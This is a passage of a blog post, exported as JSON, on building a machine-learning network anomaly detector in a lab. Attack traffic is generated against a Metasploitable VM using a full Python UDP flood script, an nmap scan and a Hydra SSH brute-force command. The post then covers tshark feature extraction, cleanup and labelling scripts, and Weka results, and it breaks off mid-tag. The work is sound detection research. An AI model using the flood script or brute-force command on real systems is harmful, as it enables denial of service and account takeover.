{"id":4392,"date":"2021-10-13T11:02:50","date_gmt":"2021-10-13T03:02:50","guid":{"rendered":"http:\/\/mayanknauni.com\/?p=4392"},"modified":"2022-12-12T13:19:19","modified_gmt":"2022-12-12T05:19:19","slug":"basic-machine-learning-network-anomaly-detection","status":"publish","type":"post","link":"https:\/\/mayanknauni.com\/?p=4392","title":{"rendered":"Basic Machine Learning : Network Anomaly Detection"},"content":{"rendered":"<p><strong><em>Disclaimer:-<\/em><\/strong><em> This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.<\/em><\/p>\n<p>Special Thanks to <a href=\"https:\/\/www.linkedin.com\/in\/kennyongjh\">Kenny Ong<\/a>, my friend &amp; course-mate at Singapore University of Technology and Design for collaborating with me on this mini-project and <a href=\"https:\/\/www.linkedin.com\/in\/tao-liu-2b050423\/\">Tao Liu<\/a> for his excellent blog on the same subject <a href=\"https:\/\/www.linkedin.com\/pulse\/build-machine-learning-model-network-flow-tao-liu\/\">https:\/\/www.linkedin.com\/pulse\/build-machine-learning-model-network-flow-tao-liu\/<\/a><\/p>\n<h1><\/h1>\n<h1><a id=\"post-4392-_Toc80553219\"><\/a>Introduction<\/h1>\n<p>The ever-increasing rise in the number of network attacks have evolved as Internet technologies advancements and enhancements continue to improve our lives and in recent years, network intrusion detection has become a significant research issue in the industry.<\/p>\n<p>The term <em>network anomaly detection<\/em> refers to the identification of the rare and unexpected bursts in activity within computer networking. Network anomaly is an intrusion attempt that is deliberate for (i) accessing information, (ii) information manipulation, or (iii) render a computer system or network unreliable or unusable.<\/p>\n<p>In this project, to provide a proper setup in detecting anomaly detection, the concept of normality needs to be grasped. The traffic captured concerning normality and anomaly needs to be defined. The usage of tools to help create datasets can help us provide more findings in the areas of network intrusion detection methods and systems (NIDS).<\/p>\n<p><em>\u00a0<\/em><\/p>\n<h2><a id=\"post-4392-_Toc80553220\"><\/a>Lab Setup and Topology<\/h2>\n<p>The network topology is set up using GNS3 Emulator as a tool to simulate the network anomaly detection system. The following are the devices and virtual machines (VM).<\/p>\n<ul>\n<li>Switch (Gateway) Based on Cisco IOS image (12.4) \u2013 10.0.2.1<\/li>\n<li>Kali Attacker VM \u2013 2021.2 release \u2013 10.0.2.15<\/li>\n<li>Metasploitable-2 VM \u2013 10.0.2.2<\/li>\n<li>SIEM VM \u2013 10.0.2.30<\/li>\n<\/ul>\n<p>GitHub Repo: <a href=\"https:\/\/github.com\/mayanknauni\/ML_Cybersecurity\">https:\/\/github.com\/mayanknauni\/ML_Cybersecurity<\/a><\/p>\n<h3><a id=\"post-4392-_Toc80553221\"><\/a>Topology Brief:<\/h3>\n<p>The topology has been created on GN3 network emulator which used real IOS image for Cisco Switch (12.4 version); the Kali VM (2021.2 Release) and Metasploitable VM are created on VirtualBox and VirtualBox is integrated with GNS3, the VMs are connected to the switch using a generic driver (UDP tunnel).<\/p>\n<p>On the switch end, we have created a SPAN session to capture all traffic for the network port connected to the metasploitable VM and redirect it to the SIEM VM. We will use \u201ctshark\u201d on the SIEM VM to convert the \u201c. pcap\u201d files capture to \u201c.csv\u201d files.<\/p>\n<p>Below is the GN3 topology that we have created and used for this project, the SIEM was an additional VM that was used to sniff the data during attacks to see how the attacks are being perceived by a SIEM software.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"827\" height=\"687\" class=\"wp-image-4394 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?resize=827%2C687&#038;ssl=1\" alt=\"Diagram Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?w=827&amp;ssl=1 827w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?resize=300%2C249&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.png?resize=768%2C638&amp;ssl=1 768w\" sizes=\"auto, (max-width: 827px) 100vw, 827px\" \/><\/p>\n<h2><a id=\"post-4392-_Toc80553222\"><\/a>Strategy<\/h2>\n<p>We will try to build a machine learning model for Wireshark packet-flow classification, we followed the below process to do the same:<\/p>\n<p>The ML model is prepared according to the strategy below:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-4412 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?resize=810%2C579&#038;ssl=1\" alt=\"\" width=\"810\" height=\"579\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?w=810&amp;ssl=1 810w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?resize=300%2C214&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/ML.jpg?resize=768%2C549&amp;ssl=1 768w\" sizes=\"auto, (max-width: 810px) 100vw, 810px\" \/><\/p>\n<p>Our strategy is to execute four attacks, elaborated in the method section, and manually capture packets for them on the metasploitable server end, each capture is labelled accordingly, and later, all four captures are aggregated (including the benign network capture) to form a dataset.<\/p>\n<p>The dataset is then sanitized using the python script which essentially vets the dataset for NaN values and replaces the empty cells with 0.<\/p>\n<p>We also replaced the IP address and TCP flags value with integer values for our algorithm to run properly.<\/p>\n<h1><a id=\"post-4392-_Toc80553223\"><\/a>Methods<\/h1>\n<p>The creation of the datasets includes capturing the normal and benign communication between these clients and servers through Python scripts and all traffic collected via Wireshark as the packet capture tool.<\/p>\n<p>The 4 kinds of attacks implemented and run from the malicious clients are as follows:<\/p>\n<ul>\n<li>DDoS<\/li>\n<li>Brute force<\/li>\n<li>Probe<\/li>\n<li>SQL<\/li>\n<\/ul>\n<p>From these attacks, benign and malicious traffic is merged and labeled for classification and further analysis via Weka.<\/p>\n<h2><a id=\"post-4392-_Toc80553224\"><\/a>Attack Details<\/h2>\n<p>The attack was carried out at the timestamps below:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Start Time<\/strong><\/td>\n<td><strong>End Time<\/strong><\/td>\n<td><strong>Exploit<\/strong><\/td>\n<td><strong>Remark <\/strong><\/td>\n<\/tr>\n<tr>\n<td>8:05 pm<\/td>\n<td>8:15 pm<\/td>\n<td>Benign<\/td>\n<td>Simulating usual Web Access by using the watch at 5-second interval to simulate normal web access<br \/>\nwatch -n 5 &#8220;curl http:\/\/10.0.2.2&#8221;<\/td>\n<\/tr>\n<tr>\n<td>8:16 pm<\/td>\n<td>8:20 pm<\/td>\n<td>DDOS<\/td>\n<td>ddos.py<\/td>\n<\/tr>\n<tr>\n<td>9:00 pm<\/td>\n<td>9:06 pm<\/td>\n<td>Probe<\/td>\n<td>nmap<\/td>\n<\/tr>\n<tr>\n<td>9:15 pm<\/td>\n<td>9:20 pm<\/td>\n<td>Bruteforce<\/td>\n<td>Hydra<\/td>\n<\/tr>\n<tr>\n<td>9:30 pm<\/td>\n<td>9:37 pm<\/td>\n<td>SQL<\/td>\n<td>Metasploitable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><a id=\"post-4392-_Toc80553225\"><\/a>Benign Flow Capture<\/h3>\n<p>We simulated usual Web Access by using the watch at the 5-second interval and captured the packets:<\/p>\n<p>Command: watch -n 5 &#8220;curl http:\/\/10.0.2.2&#8221;<\/p>\n<h3><a id=\"post-4392-_Toc80553226\"><\/a>DDoS Attack and packet capture<\/h3>\n<p>We used the below-mentioned python code to simulate DDoS attack on Metasploitable2<\/p>\n<p>import sys<br \/>\nimport os<br \/>\nimport time<br \/>\nimport socket<br \/>\nimport random<br \/>\n#Code Time<br \/>\nfrom DateTime import datetime<br \/>\nnow = datetime.now()<br \/>\nhour = now.hour<br \/>\nminute = now.minute<br \/>\nday = now.day<br \/>\nmonth = now.month<br \/>\nyear = now.year<\/p>\n<p>##############<br \/>\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)<br \/>\nbytes = random._urandom(1490)<br \/>\n#############<\/p>\n<p>os.system(&#8220;clear&#8221;)<br \/>\nos.system(&#8220;figlet DDos Attack&#8221;)<br \/>\nprint<br \/>\nprint<br \/>\nip = raw_input(&#8220;IP Target : &#8220;)<br \/>\nport = input(&#8220;Port : &#8220;)<\/p>\n<p>os.system(&#8220;clear&#8221;)<br \/>\nos.system(&#8220;figlet Attack Starting&#8221;)<br \/>\ntime.sleep(3)<br \/>\nsent = 0<br \/>\nwhile True:<br \/>\nsock.sendto(bytes, (ip,port))<br \/>\nsent = sent + 1<br \/>\nport = port + 1<br \/>\nprint &#8220;Sent %s packet to %s throught port:%s&#8221;%(sent,ip,port)<br \/>\nif port == 65534:<br \/>\nport = 1<\/p>\n<p>Command: python2 ddos.py<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"526\" height=\"232\" class=\"wp-image-4395 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated.png?resize=526%2C232&#038;ssl=1\" alt=\"Text Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated.png?w=526&amp;ssl=1 526w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated.png?resize=300%2C132&amp;ssl=1 300w\" sizes=\"auto, (max-width: 526px) 100vw, 526px\" \/><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"667\" class=\"wp-image-4396 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-1.png?resize=636%2C667&#038;ssl=1\" alt=\"Text Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-1.png?w=636&amp;ssl=1 636w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-1.png?resize=286%2C300&amp;ssl=1 286w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/p>\n<p>The attack started endlessly till we break the sequence.<\/p>\n<h3><a id=\"post-4392-_Toc80553227\"><\/a>Nmap Probe and Packet Capture<\/h3>\n<p>We used the below-mentioned python code to initiate a probe on Metasploitable2<\/p>\n<p>Command: <em>nmap -sC -sV -oA project 10.0.2.2<\/em><\/p>\n<p>The packets were captured during the time when the scan started and completed successfully.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1817\" height=\"902\" class=\"wp-image-4397\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=1817%2C902&#038;ssl=1\" alt=\"Graphical user interface, application Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?w=1817&amp;ssl=1 1817w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=300%2C149&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=1024%2C508&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=768%2C381&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description.png?resize=1536%2C763&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h3><a id=\"post-4392-_Toc80553228\"><\/a>Bruteforce and Packet Capture<\/h3>\n<p>We used Hydra to launch a brute-force attack on port 22 by SSH login attempts<\/p>\n<p>Command: <em>sudo hydra -V -f -t 4 -l msfadmin -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/10.0.2.2<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1892\" height=\"585\" class=\"wp-image-4398\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=1892%2C585&#038;ssl=1\" alt=\"Graphical user interface Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?w=1892&amp;ssl=1 1892w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=300%2C93&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=1024%2C317&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=768%2C237&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-description-automaticall.png?resize=1536%2C475&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h2><a id=\"post-4392-_Toc80553229\"><\/a>Feature Extraction (using T-Shark)<\/h2>\n<p>Command:<\/p>\n<table>\n<tbody>\n<tr>\n<td>tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf \\-e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer \\-e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta &gt; benign.csv<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>We are selecting below 26 features from the Wireshark capture: &#8211;<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Features<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr>\n<td>ip.src<\/td>\n<td>Source Address<\/td>\n<td>IPv4 address<\/td>\n<\/tr>\n<tr>\n<td>ip.dst<\/td>\n<td>Destination Address<\/td>\n<td>IPv4 address<\/td>\n<\/tr>\n<tr>\n<td>ip.len<\/td>\n<td>Total Length<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>ip.flags.df<\/td>\n<td>Don\u2019t fragment<\/td>\n<td>Boolean<\/td>\n<\/tr>\n<tr>\n<td>ip.flags.mf<\/td>\n<td>More fragments<\/td>\n<td>Boolean<\/td>\n<\/tr>\n<tr>\n<td>ip.fragment<\/td>\n<td>IPv4 Fragment<\/td>\n<td>Frame number<\/td>\n<\/tr>\n<tr>\n<td>ip.fragment.count<\/td>\n<td>Fragment count<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>ip.fragments<\/td>\n<td>IPv4 Fragments<\/td>\n<td>Sequence of bytes<\/td>\n<\/tr>\n<tr>\n<td>ip.ttl<\/td>\n<td>Time to Live<\/td>\n<td>Unsigned integer, 1 byte<\/td>\n<\/tr>\n<tr>\n<td>ip.proto<\/td>\n<td>Protocol<\/td>\n<td>Unsigned integer, 1 byte<\/td>\n<\/tr>\n<tr>\n<td>tcp.window_size<\/td>\n<td>Calculated window size<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.ack<\/td>\n<td>Acknowledgment Number<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.seq<\/td>\n<td>Sequence Number<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.len<\/td>\n<td>TCP Segment Len<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.stream<\/td>\n<td>Stream index<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.urgent_pointer<\/td>\n<td>Urgent Pointer<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.flags<\/td>\n<td>Flags<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>tcp.analysis.ack_rtt<\/td>\n<td>The RTT to ACK the segment was<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>tcp.segments<\/td>\n<td>Reassembled TCP Segments<\/td>\n<td>Label<\/td>\n<\/tr>\n<tr>\n<td>tcp.reassembled.length<\/td>\n<td>Reassembled TCP length<\/td>\n<td>Unsigned integer, 4 bytes<\/td>\n<\/tr>\n<tr>\n<td>http.request<\/td>\n<td>Request<\/td>\n<td>Boolean<\/td>\n<\/tr>\n<tr>\n<td>udp.port<\/td>\n<td>Source or Destination Port<\/td>\n<td>Unsigned integer, 2 bytes<\/td>\n<\/tr>\n<tr>\n<td>frame.time_relative<\/td>\n<td>Time since reference or first frame<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>frame.time_delta<\/td>\n<td>Time delta from previous captured frame<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>tcp.time_relative<\/td>\n<td>Time since first frame in this TCP stream<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<tr>\n<td>tcp.time_delta<\/td>\n<td>Time since previous frame in this TCP stream<\/td>\n<td>Time offset<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-4392-_Toc80553230\"><\/a>Data Clean-up<\/h2>\n<p>Command: python3 step1_cleanup.py <em>benign.csv<\/em><\/p>\n<p>The script below removes the row in the supplied csv file, beingn.csv in this case with 0 value, all null values are filled in with 0 and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.<\/p>\n<p>#!\/usr\/bin\/env python<\/p>\n<p>import pandas as pd<br \/>\nimport sys<br \/>\nfrom functools import reduce<br \/>\nimport socket<br \/>\nimport struct<br \/>\nimport ipaddress<\/p>\n<p>filename = sys.argv[1]<br \/>\nfile1 = pd.read_csv(filename)<br \/>\nfile1.head(10)<br \/>\nfile1.isnull().sum<br \/>\n#print(file1.isnull().sum)<br \/>\n# step-1 to replace all null<br \/>\nupdate_file = file1.fillna(&#8221; &#8220;)<br \/>\nupdate_file.isnull().sum()<br \/>\n#print (update_file.isnull().sum())<br \/>\nupdate_file.to_csv(&#8216;updated_&#8217;+filename, index = False)<br \/>\n# step-2 to remove all rows with null value<br \/>\nupdate_file = file1.fillna(0)<br \/>\n#print (update_file.isnull().sum())<br \/>\n# step-3 to convert tcp.flag, ip.dst, ip.src to integer<br \/>\nupdate_file[&#8216;tcp.flags&#8217;] = update_file[&#8216;tcp.flags&#8217;].apply(lambda x: int(str(x), 16))<br \/>\nupdate_file[&#8216;ip.dst&#8217;] = update_file[&#8216;ip.dst&#8217;].apply(lambda x: int(ipaddress.IPv4Address(x)))<br \/>\nupdate_file[&#8216;ip.src&#8217;] = update_file[&#8216;ip.src&#8217;].apply(lambda x: int(ipaddress.IPv4Address(x)))<br \/>\nupdate_file.to_csv(&#8216;updated_&#8217;+filename, index = False)<\/p>\n<p>The command above generated a new file with cleaned up data as \u201cupdated_beingn.csv\u201d.<\/p>\n<h2><a id=\"post-4392-_Toc80553231\"><\/a>Data Labelling<\/h2>\n<p>We use another python script to add another column in the file \u201cupdated_benign.csv\u201d with the name \u201clabel\u201d and specify the label with the command below: &#8211;<\/p>\n<p>Command: python2 step2_labelling.py benign <em>updated_benign.csv<\/em><\/p>\n<p>import sys<br \/>\nimport csv<\/p>\n<p>label = sys.argv[1]<br \/>\nfile_name = sys.argv[2]<\/p>\n<p>file = open(file_name)<br \/>\ncontent = csv.reader(file)<br \/>\nrow0 = content.next()<br \/>\nrow0.append(&#8216;label&#8217;)<br \/>\nall = []<br \/>\nall.append(row0)<br \/>\nfor item in content:<br \/>\nitem.append(label)<br \/>\nall.append(item)<\/p>\n<p>new_file = open(label+&#8217;_&#8217;+ file_name, &#8216;w&#8217;)<br \/>\nwriter = csv.writer(new_file, lineterminator=&#8217;\\n&#8217;)<br \/>\nwriter.writerows(all)<\/p>\n<p>It creates a new file with name benign_updated_benign.csv, where the benign highlighted in yellow is the label, we have passed with the python script.<\/p>\n<p>This step is repeated for all four attacks and four additional csv files are obtained: &#8211;<\/p>\n<ul>\n<li>benign_update_benign.csv<\/li>\n<li>bruteforce_update_bruteforce.csv<\/li>\n<li>ddos_update_ddos.csv<\/li>\n<li>probe_update_nmap.csv<\/li>\n<li>sqlattack_update_sqlattack.csv<\/li>\n<\/ul>\n<p>We will aggregate the above five files into our common dataset called \u201cmaster_dataset.csv\u201d. We will use this dataset further to analyze Weka.<\/p>\n<h2><a id=\"post-4392-_Toc80553232\"><\/a>Analysis on Weka<\/h2>\n<p>We analyzed the \u201cmaster_dataset.csv\u201d in Weka software, we opened this csv in Weka, a glimpse of label attribute is below: &#8211;<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1010\" height=\"765\" class=\"wp-image-4399 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?resize=1010%2C765&#038;ssl=1\" alt=\"Graphical user interface, application Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?w=1010&amp;ssl=1 1010w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?resize=300%2C227&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-1.png?resize=768%2C582&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h3><a id=\"post-4392-_Toc80553233\"><\/a>Feature Evaluation<\/h3>\n<p>We ran RelieFAttributeEval which yielded the below results:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1247\" height=\"813\" class=\"wp-image-4400 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=1247%2C813&#038;ssl=1\" alt=\"A picture containing text, screenshot, window Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?w=1247&amp;ssl=1 1247w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=1024%2C668&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-window-des.png?resize=768%2C501&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p>The top 15 attributes out of 26 are ranked below:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Rank<\/strong><\/td>\n<td><strong>Attributes<\/strong><\/td>\n<\/tr>\n<tr>\n<td>1<\/td>\n<td>tcp.stream<\/td>\n<\/tr>\n<tr>\n<td>2<\/td>\n<td>ip.flags.df<\/td>\n<\/tr>\n<tr>\n<td>3<\/td>\n<td>tcp.flags<\/td>\n<\/tr>\n<tr>\n<td>4<\/td>\n<td>ip.proto<\/td>\n<\/tr>\n<tr>\n<td>5<\/td>\n<td>tcp.window_size<\/td>\n<\/tr>\n<tr>\n<td>6<\/td>\n<td>frame.time_relative<\/td>\n<\/tr>\n<tr>\n<td>7<\/td>\n<td>ip.len<\/td>\n<\/tr>\n<tr>\n<td>8<\/td>\n<td>ip.flags.mf<\/td>\n<\/tr>\n<tr>\n<td>9<\/td>\n<td>udp.port<\/td>\n<\/tr>\n<tr>\n<td>10<\/td>\n<td>ip.fragment.count<\/td>\n<\/tr>\n<tr>\n<td>11<\/td>\n<td>tcp.len<\/td>\n<\/tr>\n<tr>\n<td>12<\/td>\n<td>tcp.analysis.ack_rtt<\/td>\n<\/tr>\n<tr>\n<td>13<\/td>\n<td>ip.dst<\/td>\n<\/tr>\n<tr>\n<td>14<\/td>\n<td>ip.fragment<\/td>\n<\/tr>\n<tr>\n<td>15<\/td>\n<td>tcp.ack<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><a id=\"post-4392-_Toc80553234\"><\/a>Running Different ML Models<\/h3>\n<h4><a id=\"post-4392-_Toc80553235\"><\/a>J48<\/h4>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1242\" height=\"810\" class=\"wp-image-4401 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=1242%2C810&#038;ssl=1\" alt=\"A picture containing text, screenshot, indoor Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?w=1242&amp;ssl=1 1242w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=1024%2C668&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-text-screenshot-indoor-des.png?resize=768%2C501&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p><em>Correctly Classified Instances 16204 98.4088 %<\/em><\/p>\n<p><em>Incorrectly Classified Instances 262 1.5912 %<\/em><\/p>\n<h5><a id=\"post-4392-_Toc80553236\"><\/a>J48 Decision Tree View<\/h5>\n<p><em><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1908\" height=\"957\" class=\"wp-image-4402\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=1908%2C957&#038;ssl=1\" alt=\"Text Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?w=1908&amp;ssl=1 1908w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=300%2C150&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=1024%2C514&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=768%2C385&amp;ssl=1 768w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/text-description-automatically-generated-2.png?resize=1536%2C770&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/em><\/p>\n<h4><a id=\"post-4392-_Toc80553237\"><\/a>MLP<\/h4>\n<p><strong><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1241\" height=\"806\" class=\"wp-image-4403 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=1241%2C806&#038;ssl=1\" alt=\"A picture containing calendar Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?w=1241&amp;ssl=1 1241w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=300%2C195&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=1024%2C665&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-calendar-description-automat.png?resize=768%2C499&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/strong><\/p>\n<p>Correctly Classified Instances 16148 98.0687 %<\/p>\n<p>Incorrectly Classified Instances 318 1.9313 %<\/p>\n<h4><a id=\"post-4392-_Toc80553238\"><\/a>SMO<\/h4>\n<p><strong><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1243\" height=\"812\" class=\"wp-image-4404 aligncenter\" 